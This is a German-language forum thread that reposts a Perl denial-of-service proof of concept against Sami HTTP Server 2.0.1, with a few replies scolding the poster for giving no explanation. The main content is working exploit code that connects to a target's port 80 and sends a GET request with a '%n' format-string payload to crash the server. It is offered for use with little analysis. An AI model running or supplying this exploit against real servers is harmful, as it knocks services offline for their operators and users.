myGully.com - Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

myGully.com (https://mygully.com/index.php)

- Sicherheit & Anonymität (https://mygully.com/forumdisplay.php?f=65)

- - Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit (https://mygully.com/showthread.php?t=2159862)

Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

Code:

#!/usr/bin/perl

# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

# Date: 25.10.10

# Tool: Sami HTTP Server -- Version: 2.0.1

# Vendor-Website: http://www.karjasoft.com/old.php

# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe

# Author: wingthor

# Author-Website (German): http://www.wingthor.de

# Author-Email: [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...]

# Tested on: Windows XP SP3

# Type: DOS/POC

 

 

use IO::Socket;

 

$target = "127.0.0.1";

$port   = 80;

 

$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";

 

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";

 

$sock->send($payload);

 

close($sock);

Und hast du jetz irgend eine Frage dazu? Oder wolltest du einfach bloß IRGENDWAS posten?

Irgendwas? Naja, eher ein Exploit.
Dieser Thread wurde [Link nur für registrierte und freigeschaltete Mitglieder sichtbar. Jetzt registrieren...] verlinkt, solltest du dir vielleicht mal durchlesen. :)

Einen Codeschnipsel, der noch dazu von jemand anderem ist, posten kann jeder, beschreiben wie er funktioniert und was er macht, da gehört schon ein bischen mehr dazu.:rolleyes: Außerdem handelt es sich dabei laut der Website des Autors nur um ein Proof of Concept.

LESEN:

Zitat:

GET Request Denial of Service Exploit

Es ist ein HTTP DoS Exploit, simpler gehts kaum.